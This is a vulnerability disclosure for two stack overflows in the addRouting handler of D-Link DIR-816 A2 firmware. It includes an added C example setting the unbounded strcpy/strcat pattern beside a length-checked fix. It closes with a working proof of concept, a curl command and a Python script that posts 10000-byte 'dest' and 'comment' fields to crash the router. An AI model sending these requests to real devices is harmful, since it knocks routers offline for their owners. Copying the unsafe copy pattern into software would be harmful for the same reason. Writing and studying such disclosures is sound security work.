
D-Link DIR-816 A2_v1.10CNB04.img stack overflow vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

As can be seen from the figure above, when `hostnet` is `net`, the value of `dest` is copied into `v14`. Notably, the length of `dest` is never checked, so an oversized value overflows the stack buffer.

Further down in the same function there is a second stack overflow. As shown in the figure above, `v18`, which is controllable, is the `comment` parameter, and `v18` is appended to `v16`. Again there is no size limit, which also leads to a stack overflow.
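To make the two defects concrete from the defender's side, the following is an added C example, not code from the write-up or from the router firmware. It reconstructs the shape of the handler as described above (a copy of `dest` into a fixed stack buffer when `hostnet` is `net`, then a concatenation of `comment` into another fixed stack buffer) beside a bounded version that rejects oversized parameters instead of copying them. The buffer names follow the decompiler variables in the text; the buffer sizes, the `"route: "` prefix and the function names are assumptions.

```c
/* Added example (not from the original write-up or the firmware).
 * Buffer sizes and the "route: " prefix are assumed; the real handler's
 * stack layout is not known from the page. */
#include <stdio.h>
#include <string.h>

#define DEST_BUF_SZ    64    /* assumed size of v14 */
#define COMMENT_BUF_SZ 128   /* assumed size of v16 */

/* Pattern described in the write-up: unbounded strcpy/strcat into stack
 * buffers. It is kept here only as the "before" picture and is only ever
 * called with short inputs in this file. */
static size_t add_routing_unsafe(const char *hostnet, const char *dest,
                                 const char *comment)
{
    char v14[DEST_BUF_SZ] = {0};
    char v16[COMMENT_BUF_SZ] = "route: ";

    if (strcmp(hostnet, "net") == 0)
        strcpy(v14, dest);        /* no bound: dest >= 64 bytes overflows */
    strcat(v16, comment);         /* no bound: long comment overflows      */
    return strlen(v14) + strlen(v16);
}

/* strnlen-style helper so the check never reads past the buffer limit. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened form: measure each parameter against the space actually left
 * in its destination and refuse the request rather than truncating silently.
 * Returns 0 on success, -1 if dest is too long, -2 if comment is too long. */
int add_routing_checked(const char *hostnet, const char *dest,
                        const char *comment)
{
    char v14[DEST_BUF_SZ] = {0};
    char v16[COMMENT_BUF_SZ] = "route: ";

    if (strcmp(hostnet, "net") == 0) {
        size_t dlen = bounded_len(dest, DEST_BUF_SZ);
        if (dlen >= DEST_BUF_SZ)      /* need room for the terminating NUL */
            return -1;
        memcpy(v14, dest, dlen + 1);
    }

    size_t used  = strlen(v16);
    size_t avail = COMMENT_BUF_SZ - used;     /* bytes left incl. NUL */
    size_t clen  = bounded_len(comment, avail);
    if (clen >= avail)
        return -2;
    memcpy(v16 + used, comment, clen + 1);
    return 0;
}

/* Constructed oversized input (10000 'a's, matching the PoC's parameter
 * length) used to exercise the checks without ever touching the unsafe copy. */
const char *oversize(void)
{
    static char big[10001];
    if (big[0] == '\0') {
        memset(big, 'a', sizeof(big) - 1);
        big[sizeof(big) - 1] = '\0';
    }
    return big;
}

int main(void)
{
    /* Short inputs are harmless for both versions. */
    printf("unsafe, short input: total len %zu\n",
           add_routing_unsafe("net", "192.168.1.0", "office"));
    printf("checked, short input: %d\n",
           add_routing_checked("net", "192.168.1.0", "office"));
    /* The checked version rejects each oversized parameter. */
    printf("checked, long dest: %d\n",
           add_routing_checked("net", oversize(), "office"));
    printf("checked, long comment: %d\n",
           add_routing_checked("net", "192.168.1.0", oversize()));
    return 0;
}
```

The checks measure the parameter against the remaining capacity of its own buffer and return an error code for the web handler to report; truncating with `strncpy` would avoid the crash but silently alter the routing entry.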

PoC

We need to get the tokenid first:

```bash
curl http://192.168.0.1/dir_login.asp | grep tokenid
```

Then construct the following PoC:

```python
import requests

# Coloured print helpers (orange and red)
li = lambda x: print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x: print('\x1b[01;38;5;1m' + x + '\x1b[0m')

# tokenid taken from the dir_login.asp page (see the curl command above)
tokenid = 'xxx'

url = 'http://192.168.0.1/goform/addRouting'

data = {
    'tokenid': tokenid,
    'dest': 'a' * 10000,          # oversized dest, copied into v14 without a bound
    'hostnet': 'net',             # required to reach the dest copy
    'netmask': '255.255.255.0',
    'gateway': '192.168.0.1',
    'interface': 'LAN',
    'custom_interface': 'br0',
    'comment': 'a' * 10000,       # oversized comment, appended to v16 without a bound
}

response = requests.post(url, data=data)
response.encoding = 'utf-8'
info = response.text
li(url)
print(info)
```

Finally, the router crashes.